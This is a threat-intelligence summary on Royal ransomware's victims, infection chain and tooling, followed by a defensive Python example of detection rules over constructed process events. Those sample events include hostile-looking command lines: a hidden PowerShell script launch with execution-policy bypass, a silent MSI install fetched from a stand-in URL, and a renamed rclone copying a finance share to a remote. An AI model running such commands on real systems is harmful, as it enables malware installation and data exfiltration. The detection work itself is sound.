Royal Ransomware Continues to Spread, With US Organizations Hit Hardest
Category: Ransomware News | Industry: Global | Level: Tactical | Source: Unit 42
Since its emergence in September 2022, the Royal ransomware gang has established itself as a clear and proficient threat group. A Unit 42 threat assessment details recent activity and metrics for the group. Unit 42 identifies Royal as a "private group made up of former members of Conti." Unlike other prominent ransomware gangs such as LockBit and ALPHV/Blackcat, the group has not operated or recruited members under a Ransomware-as-a-Service (RaaS) model. Royal ransomware has affected a wide range of industries, most prominently manufacturing, wholesale and retail, professional and legal services, education, construction, and healthcare. By country, the United States accounted for "64% of the impacted organizations," 100 of 155 cases in total. Canada was a distant second with 13 cases, followed by Germany with 11, the United Kingdom with 6, and Brazil with 4 to round out the top five.
Royal ransomware infections have been observed abusing search engine optimization (SEO) poisoning and malvertising campaigns to drop malware. Unit 42 observed these lures initiating "a complex infection chain with multiple stages, including PowerShell scripts and MSI files. In certain cases, this leads to infection with BATLOADER." BATLOADER can then stage additional payloads, including Cobalt Strike; batch scripts designed to disable security monitoring; reconnaissance tools such as NetScan; PsExec to aid lateral movement; information-stealing malware; and system and remote management tools such as NSudo and Syncro. For data exfiltration, Rclone is the tool most commonly associated with Royal threat actors. Based on samples observed "as of late April," the Windows variant of Royal's encryptor does not employ any "anti-analysis tricks or string encryption." The Royal ransomware gang has also added a Linux variant of its encryptor, broadening the range of systems it can target.
Anvilogic Use Cases:
- Malicious Software Download via MSI/JS
- Executable Create Script Process
- MSIExec Install MSI File
- Rclone Execution
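The following is an added example, not Anvilogic's rule logic and not code from the Unit 42 report: a small set of detection rules over constructed Sysmon-style process-creation events, modeled on three of the use cases listed above (an executable spawning a script host, msiexec installing an MSI file, and Rclone execution, including a renamed Rclone binary identified by its PE OriginalFileName or its command-line remote syntax). The interpretation of each use-case name, the benign-parent allowlist, the regular expressions, the severity labels and all sample events are assumptions made for this example and would need tuning for a real environment.

```python
"""Toy process-creation detections modeled on the Anvilogic use cases above.

Added example: the rule interpretations, allowlists, regexes and sample
events are constructed assumptions, not Anvilogic's or Unit 42's content.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One Sysmon-style process-creation record (field set is an assumption)."""
    parent_image: str
    image: str
    command_line: str
    original_file_name: str = ""  # PE OriginalFileName; survives renaming on disk


SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parents for which a script-host child is routine (assumption; tune per environment).
BENIGN_SCRIPT_PARENTS = SCRIPT_HOSTS | {"explorer.exe", "services.exe", "svchost.exe", "code.exe"}

MSI_INSTALL_SWITCH = re.compile(r"(^|\s)/(i|package|a)\b", re.IGNORECASE)  # msiexec install switches
REMOTE_MSI = re.compile(r"https?://\S+?\.msi\b", re.IGNORECASE)            # MSI fetched from a URL
LOCAL_MSI = re.compile(r"\.msi\b", re.IGNORECASE)
# rclone sub-command followed by a remote of the form "<name>:<path>"; two or more
# characters before the colon so Windows drive letters like "C:" do not match.
RCLONE_REMOTE = re.compile(r"\s(copy|sync|move|copyto)\s.*\s[\w-]{2,}:\S*", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_exe_creates_script(ev: ProcEvent):
    """Executable Create Script Process: a non-allowlisted parent launching a script host."""
    if basename(ev.image) in SCRIPT_HOSTS and basename(ev.parent_image) not in BENIGN_SCRIPT_PARENTS:
        return "medium"
    return None


def rule_msiexec_install(ev: ProcEvent):
    """MSIExec Install MSI File: msiexec installing a package; remote sources score higher."""
    if basename(ev.image) != "msiexec.exe" or not MSI_INSTALL_SWITCH.search(ev.command_line):
        return None
    if REMOTE_MSI.search(ev.command_line):
        return "high"
    if LOCAL_MSI.search(ev.command_line):
        return "low"
    return None


def rule_rclone_execution(ev: ProcEvent):
    """Rclone Execution: rclone by image name or OriginalFileName, else by its remote syntax."""
    if "rclone.exe" in {basename(ev.image), ev.original_file_name.lower()}:
        return "high"
    if RCLONE_REMOTE.search(ev.command_line):
        return "medium"  # renamed binary whose command line still looks like an rclone transfer
    return None


RULES = {
    "Executable Create Script Process": rule_exe_creates_script,
    "MSIExec Install MSI File": rule_msiexec_install,
    "Rclone Execution": rule_rclone_execution,
}


def evaluate(events):
    """Run every rule over every event; return (event index, rule name, severity) hits."""
    hits = []
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            severity = rule(ev)
            if severity:
                hits.append((idx, name, severity))
    return hits


# Constructed sample telemetry: three suspicious events and two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\alice\Downloads\Zoom-Setup.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -nop -w hidden -ep bypass -File C:\Users\alice\AppData\Local\Temp\inst.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /qn /i http://cdn.example.invalid/update.msi"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\ProgramData\svc\update.exe",  # rclone renamed on disk
              r'update.exe copy "C:\Shares\Finance" remote1:share --transfers 32',
              original_file_name="rclone.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe"),  # interactive shell from the desktop: allowlisted parent
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\bob\Downloads\7zip.msi"'),  # local install: low
]

if __name__ == "__main__":
    for idx, name, severity in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name} [{severity}] :: {SAMPLE_EVENTS[idx].command_line}")
```

The OriginalFileName check matters because the tooling described above is routinely dropped under an innocuous name; the command-line fallback catches cases where that field is unavailable, at the cost of more tuning against legitimate copy and sync jobs.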